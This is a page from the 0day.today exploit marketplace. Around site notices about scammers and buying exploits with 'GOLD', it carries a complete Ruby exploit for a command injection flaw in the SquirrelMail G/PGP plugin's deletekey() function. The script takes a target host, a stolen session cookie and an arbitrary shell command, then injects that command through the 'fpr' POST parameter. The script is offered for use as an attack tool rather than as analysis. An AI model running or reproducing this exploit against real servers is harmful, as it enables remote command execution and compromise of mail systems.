0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
SquirrelMail G/PGP Plugin deletekey() Command Injection Exploit
=============================================================== SquirrelMail G/PGP Plugin deletekey() Command Injection Exploit =============================================================== #!/usr/local/bin/ruby puts"http://backdoored.net\n" puts "SquirrelMail G/PG deletekey() command injection exploit\n" puts "Coded by Backdoored member. \n" puts "--------------------------------------------------\n" if ARGV[0] == nil && ARGV[1] == nil && ARGV[2] == nil && ARGV[3] == nil && ARGV[4] == nil && ARGV[5] == nil puts "Usage: ./squ_xploit hostname path port cookie command 0\n" puts "if host using ssl use 1 instead of 0\n" exit end require 'net/http' require 'net/https' host = ARGV[0].to_s port = ARGV[2].to_i cookie = ARGV[3].to_s victim = Net::HTTP.new(host,port) if ARGV[3].to_i == 1 puts "Entering SSL mode baby\n" victim.use_ssl = true end command = ARGV[4].to_s #path = '/sq/plugins/gpg/modules/keyring_main.php' path = ARGV[1].to_s data = "id=C5B1611B8E71C***&fpr= | " + command + "| &pos=0&sort=email_name&desc=&srch=&ring=all&passphrase=&deletekey=true&deletepair=false&trust=1" pizza = "key=pYWrEbVTY%2Bc%3D; SQMSESSID=" + cookie; headers = { 'Cookie' => pizza, 'Referer' => 'http://www.google.com', 'Content-Type' => 'application/x-www-form-urlencoded' } resp, data = victim.post(path,data,headers) puts 'Message = ' + resp.message puts 'Code = ' + resp.code resp.each {|key,val| puts key + ' = ' + val} #puts data # 0day.today [2024-12-25] #